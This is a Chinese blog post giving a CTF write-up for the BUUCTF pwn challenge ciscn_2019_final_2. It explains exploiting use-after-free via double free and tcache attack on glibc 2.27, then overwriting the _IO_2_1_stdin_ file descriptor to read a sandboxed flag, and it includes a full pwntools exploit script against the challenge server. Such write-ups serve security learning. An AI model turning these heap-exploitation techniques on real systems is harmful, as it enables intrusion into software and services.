ciscn_2019_final_2

最新推荐文章于 2023-04-12 17:05:02 发布
最新推荐文章于 2023-04-12 17:05:02 发布
阅读量465 收藏 1
点赞数 1
分类专栏: buuctf 题目 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/122862938
版权

ciscn_2019_final_2

查看保护
在这里插入图片描述

在delete这里的话有两个uaf。还开了沙盒,说实话一开始真没什么思路,看了一下ha1vk的wp才知道漏了一init里面的一个非常重要的东西
在这里插入图片描述
这里读flag。flag的文件描述符被设置成了666
在这里插入图片描述
泄露数据的话也不是很多。几个字节
攻击思路:因为是2.27下,double free泄露出堆的低位地址,利用double free将size改为0x91,这个时候可以tcache attack泄露出main_arena的低位。
libc的这些低位都有了之后接下来就是一个特别关键的了。
在这里插入图片描述
libc的低位知道了,高位一样的。可以double free申请到任意libc地址,劫持_IO_2_1_stdin_结构体,修改文件描述符为666,然后flag就会被输入进来,接着print打印flag
double free和tcache attack 和io_file详细攻击手法见z1r0’s blog

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 28206)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

menu = '> '

def add(index, num):
    r.sendlineafter(menu, '1')
    r.sendlineafter('>', str(index))
    r.sendlineafter('your inode number:', str(num))

def delete(index):
    r.sendlineafter(menu, '2')
    r.sendlineafter('>', str(index))

def row(index):
    r.sendlineafter(menu, '3')
    r.sendlineafter('>', str(index))

def leave(message):
    r.sendlineafter(menu, '4')
    r.sendlineafter('what do you want to say at last? ', message)

add(1,0x0ABCDEF)
delete(1)

for i in range(4):
   add(2,0xCDEF)

delete(2)
add(1,0) #1

delete(2)

row(2)
r.recvuntil('your short type inode number :')
heap_low_2byte = int(r.recvuntil('\n',drop = True))
if heap_low_2byte < 0:
   heap_low_2byte += 0x10000

add(2,heap_low_2byte - 0xA0)
add(2,0)

delete(1)
add(2,0x30 + 0x20 * 3 + 1)

for i in range(7):
   delete(1)
   add(2,0)

delete(1)

row(1)

r.recvuntil('your int type inode number :')
main_arena_low_4byte = int(r.recvuntil('\n',drop = True))
libc = ELF('./libc-2.27.so')

if main_arena_low_4byte < 0:
   main_arena_low_4byte += 0x100000000

malloc_hook = libc.sym['__malloc_hook']
malloc_hook_low_4byte = (main_arena_low_4byte & 0xFFFFF000) + (malloc_hook & 0xFFF)

stdin_filno = libc.sym['_IO_2_1_stdin_'] + 0x70
libc_base_low_4byte = malloc_hook_low_4byte - malloc_hook
stdin_filno_low_4byte =  libc_base_low_4byte + stdin_filno
add(2,stdin_filno_low_4byte & 0xFFFF)

add(1,0)
add(1,666)

r.sendlineafter('which command?','4')

r.interactive()
z1r0.
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Pwn-Ciscn_2019_Final
fayinq的博客
03-11 364
Ciscn_2019_Final 感觉是一道很好的堆题,使用了很多技巧以及做题思路,包括了uaf,_IO_2_1_stdin,double_free,还有 _IO_2_1_stdin_fileno,这些技巧。 IDA分析: main函数: init函数: 沙箱:(少截取一点为无所谓) allocate函数: 这里面每次无论add了int还是short int 都会把bool修改成1。 delete函数: ​ del有一段特殊判定,就是bool的判定,因为bool的存在,导致了没有办法连续释放i
[BUUCTF]PWN——ciscn_2019_final_2
mcmuyanga的博客
03-10 1096
ciscn_2019_final_2 附件 步骤 例行检查,64位程序,保护全开 本地没有flag文件,远程连接一下,经典的堆题的菜单 64位ida载入 init() allocate(),只可以申请0x20或者0x10的chunk delete() show(),show只能调用3次 bye_bye 这道题的关键点在于文件流的知识 dup2 用来复制文件描述符:int dup2 (int oldfd,int newfd) _fileno 是用来规定 fd 所指向的文件流的,i
ciscn_2019_final_2(合并为unsortbin,doublefree)
m0_51251108的博客
11-02 478
ciscn_2019_final_2: 这题对我来说太难啦,写篇博文好好理理思路,如有错误,还望指正 参考师傅:ha1vk checksec一下 64位,保护全开 逆向分析: 主界面main函数: init函数: Sandbox_Loading()函数: 开了个沙盒,貌似啥都用不了了 allocate()函数: 说错啦,第三行字那里,复制可以帮我们改到size free函数: show函数: byebye函数: 大致思路: 堆利用用劫持_IO_2_1_stdin_结构体,修改文件描述符为66
ciscn_2019_final_2【write up】
m0_73756460的博客
04-12 102
BUUCTF刷题ciscn_2019_final_2【write up】
lesson_test_calculator_final.rar_Final Test
09-19
标题 "lesson_test_calculator_final.rar_Final Test" 暗示我们正在处理一个关于软件开发的项目,特别是针对Symbian V3操作系统的一个最终测试版本。这个简易计算器是使用QT4框架在该平台上构建的,目的是作为新手...
frps_2019_data_final.xls
02-28
2019美国Federal Reserve Payments Study. The study covered general-purpose and private-label credit, debit, and prepaid cards, electronic benefits transfers (EBT) cards, ACH transfers, wire transfers, ...
code-1_touch_switch_final_android_
10-04
2. **touch_switch_final.ino**:此文件名暗示可能使用了Arduino IDE或兼容环境进行编程,因为".ino"是Arduino项目的默认文件扩展名。在这个项目中,"touch_switch_final"可能是Arduino控制的硬件部分,负责处理实际...
full_stack_final.zip
08-16
2. **数据库配置**:数据库模型、连接字符串和查询脚本,可能是SQL或NoSQL格式。 3. **README**:详细说明项目的构建、运行和测试方法,以及可能遇到的问题和解决方案。 4. **文档**:关于全栈开发的理论知识、最佳...
FINAL_OFDM_FINAL_OFDM_
10-01
FINAL_OFDMOFDM(Orthogonal Frequency Division Multiplexing)即正交频分复用技术,实际上OFDM是MCM(Multi Carrier Modulation),多载波调制的一种。通过频分复用实现高速串行数据的并行传输
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
baby_pwn 赛题 ciscn 2019 第十二届全国大学生信息安全竞赛
ciscn_final_2(堆利用任意地址写4字节+劫持IO流的文件描述符)
seaaseesa的博客
04-09 699
ciscn_final_2 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 创建堆,我们只能写入一个4字节或2字节整数。 Show的时候最多也只能显示4字节数据 Delete功能没有清空指针,并且标志是共有的,因此可以通过add另外一种堆来绕过判断,造成double free。 程序开启了沙箱保护。 显然改one_gadget是不能的了。 初始化函数里...
【buu刷题】ciscn_2019_final_3
m0_73756460的博客
03-18 337
【buu刷题】ciscn_2019_final_3 write up
BUUCTF-PWN ciscn_2019_final_5(临界条件错误,劫持GOT表项)
weixin_44145820的博客
04-14 977
目录题目分析漏洞分析漏洞利用Exp 题目分析 例行安全检查 没有PIE,方面调试 partial relro意味着这题应该直接改GOT表就能做 菜单: 没有show功能,可以考虑吧某个函数(比如free的GOT)改为puts@plt 可以申请17个chunk,编号为0-16 每次分配结束后会显示分配内存的低12bits 而本题中还有一个特殊的地方,就是content数组(0x6020e0)...
pwnciscn_2019_final_3
Nothing
12-18 1690
例行检查 保护全开,分析程序。 add函数 只能申请小于0x78大小的chunk,chunk数量不能超过24个,且题目给了申请到内存空间的地址。 free函数 free后指针没有置0,且libc是2.27的,存在tcache dup。唯一问题就在于如何得到libc的地址。泄露libc地址一般通过unsortbin,存在tcache的情况下,64位程序需要申请超过0x400大小chunk,fre...
190727 pwn-ciscn_final_14
热门推荐
whklhhhh的博客
07-27 2万+
搞了快三个小时才出来_(:з」∠)_几乎白给 雷泽太强了! 简单逆向后可以知道 该程序具有注册和登陆功能 注册后会给name赋值为userx,而get_flag的需求为name==adminx passwd成员存储原始密码加盐(随机数)加密后的结果 code成员存储其他成员加盐(随机数)加密后的结果 登录时校验passwd和code Struct: 00000000 User ...
buuctf中的一些pwn题总结(不断更新)
PLpa的博客
08-19 4470
前言: 本文记录一些buuctf中不是很典型,但是仍然值得记录的pwn题,以便于查看。 0x00:stkof——unlink 查看保护 查看IDA伪代码 增 自定义size,使用malloc分配。 删 free之后直接置空,难以利用。 改 重点来到改中,这里可以随意输入大小,然后根据输入的大小来为堆块中填入数据。这样就造成了堆溢出漏洞。 解题思路 由于此题存在堆溢出漏洞,我们又掌控着heap地址的存在位置,这样我们很容易就想到unlink漏洞来控制堆块。 由于程序本身的原因,我们先malloc一个堆
[Buuoj刷题]ciscn_2019_final_3 tcache attack
zylxixixi的博客
10-09 305
Tcache机制的引入 libc2.26以后引入了一个新的机制tcache,类似于fastbin,每条链上允许有7个chunk,多出的chunk会直接放入相应的fastbin或者Unsortedbin,跟以往不同的是,当用户申请chunk时,会优先寻找tcache中的chunk。 因为该机制的引入,提升了处理的速度,但安全性减低了,例如fastbin attach中的double free(tcache dup),free的时候会检查第一个chunk是否为自己,绕过该机制需要构造a->b->
eda_res_package_final.tar.gz
最新发布
11-13
eda_res_package_final.tar.gz是一个文件的名称,该文件是被压缩的.tar.gz文件格式。根据后缀名可以推断出该文件是经过打包和压缩的文件。其中"eda_res_package_final"是该文件的名称,".tar.gz"表示该文件使用tar...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值